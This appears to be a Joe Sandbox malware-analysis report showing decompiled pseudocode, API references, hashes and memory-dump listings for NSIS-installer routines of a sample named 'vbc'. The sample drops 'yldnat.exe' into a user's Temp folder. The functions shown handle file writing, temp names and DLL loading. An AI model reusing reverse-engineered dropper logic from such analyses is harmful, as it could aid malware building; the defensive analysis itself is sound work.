					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}


















                                                        0x0040176f
                                                        0x00401776
                                                        0x00401782
                                                        0x00401785
                                                        0x0040178a
                                                        0x0040178d
                                                        0x00401794
                                                        0x004017b0
                                                        0x00401796
                                                        0x00401797
                                                        0x00401797
                                                        0x004017b6
                                                        0x004017bb
                                                        0x004017bb
                                                        0x004017bf
                                                        0x004017c2
                                                        0x004017c7
                                                        0x004017c9
                                                        0x004017cb
                                                        0x004017d0
                                                        0x004017d0
                                                        0x004017db
                                                        0x004017db
                                                        0x004017ec
                                                        0x004017ee
                                                        0x004017ee
                                                        0x004017ef
                                                        0x004017ef
                                                        0x004017f2
                                                        0x004017f5
                                                        0x004017f8
                                                        0x004017f8
                                                        0x004017ff
                                                        0x0040180e
                                                        0x00401813
                                                        0x00401816
                                                        0x00401819
                                                        0x00000000
                                                        0x00000000
                                                        0x0040181b
                                                        0x0040181e
                                                        0x00401874
                                                        0x00401879
                                                        0x004015b6
                                                        0x0040292e
                                                        0x0040292e
                                                        0x00402c2a
                                                        0x00402c2d
                                                        0x00402c2d
                                                        0x00000000
                                                        0x00401820
                                                        0x00401826
                                                        0x0040182d
                                                        0x0040183a
                                                        0x00401845
                                                        0x0040185b
                                                        0x0040185b
                                                        0x0040185e
                                                        0x00000000
                                                        0x00401864
                                                        0x00401864
                                                        0x00401865
                                                        0x00401882
                                                        0x00402c33
                                                        0x00402c33
                                                        0x00402c33
                                                        0x00401867
                                                        0x00401867
                                                        0x00401868
                                                        0x00401493
                                                        0x0040239d
                                                        0x0040239d
                                                        0x0040239d
                                                        0x00401865
                                                        0x0040185e
                                                        0x00402c35
                                                        0x00402c39
                                                        0x00402c39
                                                        0x00401892
                                                        0x00401897
                                                        0x004018a5
                                                        0x004018aa
                                                        0x004018b0
                                                        0x004018b4
                                                        0x004018b6
                                                        0x004018be
                                                        0x004018ca
                                                        0x004018b8
                                                        0x004018b8
                                                        0x004018bc
                                                        0x00000000
                                                        0x00000000
                                                        0x004018bc
                                                        0x004018d3
                                                        0x004018d9
                                                        0x004018db
                                                        0x00000000
                                                        0x004018e1
                                                        0x004018e1
                                                        0x004018e4
                                                        0x004018fc
                                                        0x004018e6
                                                        0x004018e9
                                                        0x004018f2
                                                        0x004018f2
                                                        0x00401901
                                                        0x00401906
                                                        0x00402398
                                                        0x00000000
                                                        0x00402398
                                                        0x00000000

                                                        APIs
                                                        • lstrcatW.KERNEL32 ref: 004017B0
                                                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,00000000,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,007B4000,?,?,00000031), ref: 004017D5
                                                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 1941528284-2387052581
                                                        • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                                        • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                                                        • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                                        • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 521 4069cb-4069eb GetSystemDirectoryW 522 4069ed 521->522 523 4069ef-4069f1 521->523 522->523 524 406a02-406a04 523->524 525 4069f3-4069fc 523->525 527 406a05-406a38 wsprintfW LoadLibraryExW 524->527 525->524 526 4069fe-406a00 525->526 526->527
                                                        C-Code - Quality: 100%
                                                        			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                        0x004069e2
                                                        0x004069eb
                                                        0x004069ed
                                                        0x004069ed
                                                        0x004069f1
                                                        0x00406a04
                                                        0x004069fe
                                                        0x004069fe
                                                        0x004069fe
                                                        0x00406a1d
                                                        0x00406a31
                                                        0x00406a38

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                                        • wsprintfW.USER32 ref: 00406A1D
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME$\
                                                        • API String ID: 2200240437-1946221925
                                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                        • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                        • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040347F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 528 40347f-4034a7 GetTickCount 529 4035d7-4035df call 40302e 528->529 530 4034ad-4034d8 call 4035fe SetFilePointer 528->530 535 4035e1-4035e5 529->535 536 4034dd-4034ef 530->536 537 4034f1 536->537 538 4034f3-403501 call 4035e8 536->538 537->538 541 403507-403513 538->541 542 4035c9-4035cc 538->542 543 403519-40351f 541->543 542->535 544 403521-403527 543->544 545 40354a-403566 call 406b96 543->545 544->545 546 403529-403549 call 40302e 544->546 551 4035d2 545->551 552 403568-403570 545->552 546->545 553 4035d4-4035d5 551->553 554 403572-40357a call 406210 552->554 555 403593-403599 552->555 553->535 559 40357f-403581 554->559 555->551 556 40359b-40359d 555->556 556->551 558 40359f-4035b2 556->558 558->536 560 4035b8-4035c7 SetFilePointer 558->560 561 403583-40358f 559->561 562 4035ce-4035d0 559->562 560->529 561->543 563 403591 561->563 562->553 563->558
                                                        C-Code - Quality: 93%
                                                        			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x78f2a8
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                        0x0040348f
                                                        0x004034a2
                                                        0x004034a7
                                                        0x004035d7
                                                        0x004035d9
                                                        0x00000000
                                                        0x004035df
                                                        0x004034b3
                                                        0x004034c6
                                                        0x004034cc
                                                        0x004034d2
                                                        0x004034dd
                                                        0x004034e2
                                                        0x004034e7
                                                        0x004034ef
                                                        0x004034f1
                                                        0x004034f1
                                                        0x004034fa
                                                        0x00403501
                                                        0x00000000
                                                        0x00000000
                                                        0x00403507
                                                        0x0040350d
                                                        0x00403513
                                                        0x00000000
                                                        0x00403519
                                                        0x0040351f
                                                        0x0040353f
                                                        0x00403544
                                                        0x00403549
                                                        0x0040354f
                                                        0x00403555
                                                        0x00403566
                                                        0x00000000
                                                        0x00000000
                                                        0x00403568
                                                        0x0040356e
                                                        0x00403570
                                                        0x00403593
                                                        0x00403599
                                                        0x00000000
                                                        0x00000000
                                                        0x0040359b
                                                        0x0040359d
                                                        0x00000000
                                                        0x00000000
                                                        0x0040359f
                                                        0x0040359f
                                                        0x004035b2
                                                        0x00000000
                                                        0x00000000
                                                        0x004035c1
                                                        0x00000000
                                                        0x004035c1
                                                        0x0040357a
                                                        0x00403581
                                                        0x004035ce
                                                        0x004035d4
                                                        0x004035d4
                                                        0x00000000
                                                        0x004035d4
                                                        0x00403583
                                                        0x00403589
                                                        0x0040358f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004035d2
                                                        0x004035d2
                                                        0x00000000
                                                        0x004035d2
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493
                                                          • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,pky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID: 07y$pky
                                                        • API String ID: 1092082344-214164554
                                                        • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                                        • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                                                        • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                                        • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 564 405b9f-405bea CreateDirectoryW 565 405bf0-405bfd GetLastError 564->565 566 405bec-405bee 564->566 567 405c17-405c19 565->567 568 405bff-405c13 SetFileSecurityW 565->568 566->567 568->566 569 405c15 GetLastError 568->569 569->567
                                                        C-Code - Quality: 100%
                                                        			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                        0x00405baa
                                                        0x00405bae
                                                        0x00405bb1
                                                        0x00405bb7
                                                        0x00405bbb
                                                        0x00405bbf
                                                        0x00405bc7
                                                        0x00405bce
                                                        0x00405bd4
                                                        0x00405bdb
                                                        0x00405be2
                                                        0x00405bea
                                                        0x00405bec
                                                        0x00000000
                                                        0x00405bec
                                                        0x00405bf6
                                                        0x00405bfd
                                                        0x00405c13
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c15
                                                        0x00405c19

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                                        • GetLastError.KERNEL32 ref: 00405BF6
                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                                                        • GetLastError.KERNEL32 ref: 00405C15
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3449924974-4017390910
                                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                        • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                        • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 40618d-406199 571 40619a-4061ce GetTickCount GetTempFileNameW 570->571 572 4061d0-4061d2 571->572 573 4061dd-4061df 571->573 572->571 574 4061d4 572->574 575 4061d7-4061da 573->575 574->575
                                                        C-Code - Quality: 100%
                                                        			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                        0x00406193
                                                        0x00406199
                                                        0x0040619a
                                                        0x0040619a
                                                        0x0040619f
                                                        0x004061a0
                                                        0x004061a3
                                                        0x004061a8
                                                        0x004061ab
                                                        0x004061b5
                                                        0x004061c2
                                                        0x004061c6
                                                        0x004061ce
                                                        0x00000000
                                                        0x00000000
                                                        0x004061d2
                                                        0x00000000
                                                        0x004061d4
                                                        0x004061d4
                                                        0x004061d4
                                                        0x004061d7
                                                        0x004061da
                                                        0x004061da
                                                        0x004061dd
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-4262883142
                                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                        • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                        • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
